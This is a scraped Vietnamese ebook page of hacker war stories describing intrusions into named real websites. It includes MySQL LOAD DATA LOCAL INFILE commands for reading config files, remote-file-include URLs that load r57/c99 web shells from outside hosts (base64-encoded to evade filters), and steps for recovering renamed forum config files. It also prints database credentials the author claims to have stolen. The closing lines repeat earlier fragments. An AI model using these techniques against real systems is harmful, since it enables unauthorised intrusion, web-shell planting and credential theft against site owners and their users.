1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 310 pps

5 98 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Nội dung

đó bây giờ là vô dụng + tốn thời gian thôi. Tuy nhiên, tui phát hiện ra nó include trong file class_core.php trong folder includes hehe, mau mau run command lấy code nó liền…… Code: load data local infile '/home/rockvn/domains/rockvn.com/public_html/forum/includes/class_core.php' into table ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n'; Kekekkekeke, nói không sai mà hé hé… ra code rồi, coi cái phần : Code: include(CWD . ' Tên file config thật sẽ nằm sau đoạn này, heheh includes/config_hidden.php ….đóan không sai, admin đổi tên file hé hé… bây giờ dĩ nhiên là: Code: load data local infile '/home/rockvn/domains/rockvn.com/public_html/forum/includes/config_hidden.ph p' into table ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n'; Hé hé, ra thông tin roài… thành công mỹ mãn… Tuy là hack rockvn bằng cách local qua mysql này hơi rắc rối chút, nhưng mà kết quả thì không tệ đâu…….Ngòai cách này ra thì còn cách nữa là “Bypass safe mode” do pác @vns3curity post thì phải….chúc hack vui vẻ…. Black_hat_cr [at] VNFORCE Team © HcEgrOup.NeT How i hack thuvientinhoc.com Uhm hôm nay nghe lời rủ rê của lão "nà vá rồ" nên vào site này xem sao . Chà, members gần 60k , kinh thật . Nhìn từ trên xuống thấy nó xài IPB 2.1.7, ver này vừa mới có 1 cái bug cũng khá, kịch bản của bug là chôm session và me sao cho Admin vào ngay phần SQL toolbox, híc, nghe là thấy nản đành chuyển wa hướng local thoai. Đầu tiên ta xem hàng xóm của nó gồm thằng nào đã Trích: http://www.domaintools.com/reverse-i vientinhoc.com Kết quả là ta có 32 site cùng server với nó. Bây giờ tiến hành check bug nào Chà, có đến mí site dính SQL Injection lun, híc, khai thác thì đc đấy nhưng khả năng up đc shell là 1% T__T. Bắt đầu thấy nản rồi, bùn ngủ nữa, mới đó mà đã 2h sáng rùi T__T. Thui kệ, còn vài site nữa ráng check nốt lun T__T. Uhm, tìm đc site này http://opcpharma.com , nhìn wanh thấy có vài cái link có dấu hiệu đáng ngờ , đại loại như là: Trích: http://opcpharma.com/vn/kmai.php?html=khuyenmai21-9.htm http://opcpharma.com/vn/tuyendung.ph =tuyendung.htm http://opcpharma.com/vn/bantin.php?html=bantin.htm Check thử xem nào, biết đâu nó dính bug php include thì sao , giờ thêm dấu ' vào cuối cái link xem sao: Trích: http://opcpharma.com/vn/kmai.php?html=khuyenmai21-9.htm' A, cái gì thế này?? Trích: Fatal error: main() [function.require]: Failed opening required 'khuyenmai21- 9.htm\'' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home2/opcpharm/public_html/vn/kmai.php on line 32 haha, dính bug rùi, mừng wá, ko uổng công mình lấy tăm chống mắt nãy giờ . Bi giờ Include 1 con shell thoai Trích: http://opcpharma.com/vn/kmai.php?htm bs.com/r57.txt Ơ, sao chả thấy động tĩnh gì vậy nhỉ, lạ wá, rõ ràng dính bug rồi kia mà Thử con shell khác xem sao: Trích: http://opcpharma.com/vn/kmai.php?htm com/rs_c99.php Vẫn ko đc, kỳ lạ thật, quê roài đó nhe, thêm 1 con nữa xem sao: Trích: http://opcpharma.com/vn/kmai.php?htm coolbase64.php A, include đc rồi, haha, chắc là nó config server ko cho fép up or include các con shell dạng như r57 và c99, nhưng sau khi mình mã hóa base64 một con r57 thì mình lại include đc, chắc là vì sau khi mình mã hóa con shell thì nó ko thể check code đc nên mình include thành công . Giờ ngắm con shell cái đã , híc, con shell của lão longnhi edit lại đem đi include xấu tệ , chà safe-mod: On, lại dis rất nhìu function nữa chứ" Trích: Disable functions ec,system,passthru,readfile,shell_exec,escapeshe llarg,escapeshellcmd,proc_close,proc_open,ini_alte r,dl,popen,parse_ini_file,show_source,curl_exec Giờ bắt đầu check bypass. A bypass php ko đc nhưng bypass sql thì vô tư ^^ Cuối cùng là xem file conf_global.php, lấy thông tin DB > connect DB. Nhưng site này nó có xài mod seconds pass của IPB, híc, pó tay goài, đành chờ mí lão kia lên rồi cùng thịt HAIYEN02(HCE) how i hacked viethacker.name !! <?vnforce /* ================================================== ================================================== ===================== +How to hack viethacker.name (Remote code excution của IPB tại search.php) + 1 vài thủ thuật nhỏ. +By: black_hat_cr [at] VN FORCE Team. © HcEgrOup.neT +Thời gian: 10 15 phút (cao thủ thì nhanh hơn) Note: Cám ơn anh longnhi & navaro, đã học được rất nhiều từ 2 người. Cũng xin cám ơn tonyan đã send cái viethacker này qua (hix, hack chỉ vì khoái cái domain chứ member thì…), và cảm ơn tất cả các bạn đã ủng hộ cho bài tut mới viết (đầu tay) của tui. Xin các bạn cho í kiến sau khi đọc bài này để tui hoàn thiện hơn. ================================================== ================================================== ===================== */ Nói sơ qua về victim: 1, server: linux 2.4, có firewall, bảo mật cao…get root thì…:-) bug search, kiếm trong HCE sẽ thấy2, Software: IPB 2.04 // heheh… hack = bug search cái coi, ok, sau 2 phút đã thành công và có shell trên server // ok, đọc file conf_global.php (file config mặc định trong ipb)….dùng info connect vào // cannot connect !! dm….mệt nha, chắc thằng này nó đổi tên file config thật rồi giờ nó // lấy cái đó là dzụ mình….ức chế wa ah….coi code file index của nó cái coi…. // ặc ặc, nó zend lại hehehhehe dm, quả đúng không sai nó đổi tên file mà // Nhưng mà cái này đi hù con nít thoai hehehheheh // down file index đã zend của nó về, kiếm cái host chạy được zend (ví dụ: bluehost,…) // vì nó xài ipb 2.0.4 nên mình up source của 2.04 lên server xong xóa cái index của nó đi // bỏ cái index của thằng viethacker này vào… // Error liền: Code: IPB WARNING [2] main(./sources/admin/ad_anti.php): failed to open stream: No such file or directory (Line: 127 of /index.php) IPB WARNING [2] main(./sources/admin/ad_anti.php): failed to open stream: No such file or directory (Line: 127 of /index.php) // dm hehehhe, lừa tao hả? thật ra thì thằng admin này chuối quá // trong index của ipb thì nó include 1 số file….admin đã đổi tên cái conf_global thật // còn mấy cái file include trong đó nó hông đổi kekekek…. // Error ở trên giúp ta rất nhiêu đó, /sources/admin/ad_anti.php nó bị “not found” // kekek cái này chắc chắn là file config sau khi đổi tên… uhmm download về liền // giờ lấy dung lại cái file index cũ ….rồi cái ad_adti.php này làm giống hệt với cái index // refresh…bum…. Code: IPB WARNING [2] mysql_connect(): Access denied for user 'mzic_123'@'localhost' (using password: YES) (Line: 120 of /ips_kernel/class_db_mysql.php) //kekekkeke // đóan không sai mà….cái thằng này thiệt tình. 1 số variable mình cần biết là Code: $INFO['sql_host'] $INFO['sql_database'] $INFO['sql_user'] $INFO['sql_pass'] // còn chờ đợi gì nữa? echo nó ra liền mau kekekek… Code: <?php require("file"); echo $variable; ?> // từ từ, không hấp tấp….echo từng cái một kekekke // ặc ặc, ra info ròai kekkekeke… Code: host: localhost Database: mzic_anti User: mzic_123 Pass: fuck3r // hehehhe ra ròai…thằng admin nó lấy cái pass láo wa keke, chuối thiệt…. // log in vào cái coi…đừng nói bị giống hồi nãy nha ? ….successful kekekke // ngon lành ròai, chui vào db ngắm những gì mình đã làm được xíu // hehe, ngắm thôi, hông thèm bỏ thời gian ra down về…củ chuối // vì web có 1 ngàn mấy mem à, ai đi deface + drop db làm gì…. // hack vì khóai cái domain nó thoai // 1 số kinh nghiệm nhỏ muốn chia sẽ…. // hack như vầy, gặp zend cũng có hứng thú nhưng mà admin chuối quá hehe // chúc hack vui vẻ /* ++ Black_hat_cr [at] VNFORCE Team © HcEgrOup.NeT ++ */ ?> How I hacked with "SA" Chài, đang mò "xổ số cào" thì ra em này: Trích: . hacked viethacker.name !! <?vnforce /* ================================================== ================================================== ===================== +How to hack viethacker.name. longnhi & navaro, đã học được rất nhiều từ 2 người. Cũng xin cám ơn tonyan đã send cái viethacker này qua (hix, hack chỉ vì khoái cái domain chứ member thì…), và cảm ơn tất cả các bạn đã. mình up source của 2.04 lên server xong xóa cái index của nó đi // bỏ cái index của thằng viethacker này vào… // Error liền: Code: IPB WARNING [2] main(./sources/admin/ad_anti.php): failed

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN